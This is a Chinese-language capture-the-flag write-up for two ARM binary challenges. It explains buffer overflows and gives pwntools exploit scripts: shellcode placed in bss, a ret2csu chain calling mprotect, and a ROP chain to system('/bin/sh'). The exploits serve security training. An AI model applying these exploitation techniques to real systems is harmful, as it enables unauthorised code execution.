shanghai2018_baby_arm,jarvisoj_typo
shanghai2018_baby_arm:
程序分析:
先安装好一些环境,可以看这位师傅
https://blog.csdn.net/A951860555/article/details/116780827
安装好qemu后
qemu-aarch64 -L /usr/aarch64-linux-gnu/ ./pwn
运行程序
结合ida,可以发现
第一个输入点写入bss段
第二个输入点可以溢出
攻击方法:
无非就是bss段写shellcode,栈溢出跳到那里执行
gdb调试:
gdb调试下看看
先开端口
qemu-aarch64 -g 1234 -L /usr/aarch64-linux-gnu/ ./pwn
再打开
gdb-multiarch
接收端口
target remote localhost:1234
然后vmmap可以看到其实bss段是可读可写可执行的
再接着我们确定溢出
溢出为72
exp:
from pwn import*
r= process(["qemu-aarch64", "-L", "/usr/aarch64-linux-gnu", "./pwn"])
#r=remote('node4.buuoj.cn',28119)
elf = ELF('./pwn')
context.log_level = "debug"
context.binary = "./pwn"
shell=asm(shellcraft.sh())
r.sendlineafter('Name:',shell)
payload=cyclic(72)+p64(0x411068)
r.sendline(payload)
#gdb.attach(r)
r.interactive()
网上都是用ret2csu,控制 mprotect 提权取getshell
具体操作可以看这位师傅,讲的很清楚
https://blog.csdn.net/qq_41202237/article/details/118518498
from pwn import*
r= process(["qemu-aarch64", "-L", "/usr/aarch64-linux-gnu", "./pwn"])
#r=remote('node4.buuoj.cn',28119)
elf = ELF('./pwn')
context.log_level = "debug"
context.binary = "./pwn"
shell=p64(elf.plt['mprotect'])+asm(shellcraft.sh())
r.sendlineafter('Name:',shell)
#----------------------------
csu_down=0x4008CC
csu_up=0x4008AC
mprotect_addr=0x411068
shell_addr=0x411068+8
def csu_rop(fun,v1,v2,v3):
csu_down=0x4008CC
csu_up=0x4008AC
payload=p64(csu_down)+'b'*8+p64(csu_up)+p64(0)+p64(1)
payload+=p64(fun)+p64(v3)+p64(v2)+p64(v1)
return payload
payload=cyclic(72)+csu_rop(mprotect_addr,shell_addr,0x1000,7)+'b'*8+p64(shell_addr)
r.sendline(payload)
#gdb.attach(r)
r.interactive()
jarvisoj_typo:
程序分析:
就是一个32位静态编译的arm架构程序
然后能溢出
确定padding长度
exp:
from pwn import*
r= process(["qemu-arm","./typo"])
r=remote('node4.buuoj.cn',29543)
elf = ELF('./typo')
context.log_level = "debug"
context.binary = "./typo"
r.sendlineafter('Input ~ if you want to quit','')
#ROPgadget --binary ./typo --string '/bin/sh'
binsh=0x6c384
#ida先shift+F12,再alt+t找'/bin/sh',再找到它所在的函数就是system
system=0x10ba8
#ROPgadget --binary ./typo --only 'pop'
pop_r0_r4_pc=0x20904
payload=cyclic(112)+p32(pop_r0_r4_pc)+p32(binsh)+p32(0)+p32(system)
r.sendline(payload)
#gdb.attach(r)
r.interactive()